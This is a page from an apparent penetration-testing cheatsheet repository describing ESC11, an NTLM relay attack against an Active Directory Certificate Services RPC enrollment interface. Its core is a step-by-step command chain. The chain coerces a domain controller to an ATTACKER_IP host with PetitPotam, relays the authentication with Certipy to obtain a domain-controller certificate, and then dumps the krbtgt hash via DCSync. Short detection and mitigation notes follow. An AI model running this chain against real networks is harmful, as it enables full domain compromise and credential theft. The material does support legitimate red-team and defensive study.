daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-34-esc11-ntlm-relay-to-adcs-rpc.md (3391B)


      1 ---
      2 title: "Attack #34 โ€” ESC11 NTLM Relay to ADCS RPC"
      3 description: "ESC11 is similar to ESC8 but targets the CA's RPC enrollment interface (MS-ICPR) instead of the HTTP web enrollment. If the CA does not enforce packetโ€ฆ"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"]
      7 tools: ["Impacket", "Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ŸŸข Attack #34 โ€” ESC11 NTLM Relay to ADCS RPC.md"
     11 ---
     12 # ๐ŸŸข Attack #34 โ€” ESC11: NTLM Relay to ADCS RPC
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 ESC11 is similar to ESC8 but targets the CA's **RPC enrollment interface (MS-ICPR)** instead of the HTTP web enrollment. If the CA does not enforce packet privacy (the `IF_ENFORCEENCRYPTICERTREQUEST` flag is disabled), an attacker can relay NTLM authentication to the RPC interface to request certificates โ€” even when HTTP web enrollment is disabled or protected by EPA.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **IF_ENFORCEENCRYPTICERTREQUEST disabled** | CA RPC interface doesn't require signing/encryption |
     27 | **Coercion capability** | PetitPotam, PrinterBug, etc. |
     28 | **Network access to CA RPC** | TCP 135 + dynamic RPC ports |
     29 
     30 ***
     31 
     32 ## ๐Ÿ’ป Full Commands
     33 
     34 ### ๐Ÿ”ต Check If Vulnerable
     35 
     36 ```bash
     37 # โ”€โ”€ Certipy โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     38 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout
     39 # Look for: ESC11 โ€” IF_ENFORCEENCRYPTICERTREQUEST is disabled
     40 ```
     41 
     42 ### ๐Ÿ”ด Exploit ESC11
     43 
     44 ```bash
     45 # โ”€โ”€ Step 1: Start Certipy relay targeting RPC โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     46 certipy relay -ca CA01.corp.local -template DomainController
     47 
     48 # โ”€โ”€ Step 2: Coerce DC โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     49 python3 PetitPotam.py ATTACKER_IP DC01.corp.local
     50 
     51 # โ”€โ”€ Step 3: Authenticate with resulting certificate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     52 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
     53 
     54 # โ”€โ”€ Step 4: DCSync โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     55 secretsdump.py corp.local/'DC01$'@DC01.corp.local -hashes :<HASH> -just-dc-user krbtgt
     56 ```
     57 
     58 ***
     59 
     60 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     61 
     62 | Event ID | Source | What to Look For |
     63 |---|---|---|
     64 | **4886** | Security Log (CA) | Certificate enrollment via RPC from unexpected source |
     65 | **4768** | Security Log (DC) | PKINIT TGT using DC certificate |
     66 
     67 ***
     68 
     69 ## ๐Ÿ”— Attack Chain Context
     70 
     71 ```
     72 [ESC11] โ”€โ”€โ†’ NTLM Relay to CA RPC โ†’ same result as ESC8
     73          โ”‚
     74          โ”œโ”€โ”€โ†’ ๐Ÿ”— Alternative to ESC8 when HTTP enrollment is disabled/protected
     75          โ”œโ”€โ”€โ†’ ๐Ÿ’ฅ Same outcome: DC cert โ†’ DCSync โ†’ domain compromise
     76          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: enable IF_ENFORCEENCRYPTICERTREQUEST, disable NTLM
     77 ```
     78 
     79 ***
     80 
     81 > โœ… **Attack #34 โ€” ESC11 complete.**